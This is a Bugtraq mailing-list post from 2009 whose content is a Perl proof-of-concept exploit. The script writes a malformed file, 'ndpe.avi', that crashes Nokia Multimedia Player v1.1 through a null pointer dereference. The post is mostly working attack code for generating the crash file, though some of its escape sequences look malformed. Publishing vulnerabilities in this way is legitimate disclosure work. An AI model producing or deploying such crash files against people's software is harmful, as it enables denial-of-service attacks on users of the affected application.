[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200901251415.n0PEFtMv026738@www5.securityfocus.com>
Date: Sun, 25 Jan 2009 07:15:55 -0700
From: alphanix00@...il.com
To: bugtraq@...urityfocus.com
Subject: Nokia Multimedia Player (.AVI File) Null Dereference Pointer Exploit
#!/usr/local/bin/perl
#
# Application : Nokia Multimedia Player
# Version : v 1.1
# Bug : Local (.AVI File) Null Dereference Pointer Exploit
# Exploit Method : Local
# Author : Null Area Security
# Zigma [zigmatn @ gmail.com]
# IRC : irc://irc.nullarea.org/#nullarea
# Home : http://NullArea.NET
#
# Description : Opening a malformed .AVI file with Nokia Multimedia Player version 1.1 causes it to point to Null Pointer [00000000] which leads to crash the application .
#
# " Access violation when reading [00000000] - "
#
$area = "ndpe.avi";
$null = "\x4A\x75\x73\x74\x00\x41\x6E\x79\x74\x68\x69\6E\x76\x00".
"\x54\x75\x6E\x96\73\x69\x61\x00\x52\x75\x6C\x6C\x7A\x7A";
print "\nFuzzing Nokia Multimedia Player v 1.1\r";
print "\n\n[+] Evil file to make : $area ...\r\n";
sleep(2);
open(avi, ">./$area") || die "\nCannot open $area: $!";
print avi "$null";
close (avi);
print "\n[+] File $area successfully created!\r\n";
Powered by blists - more mailing lists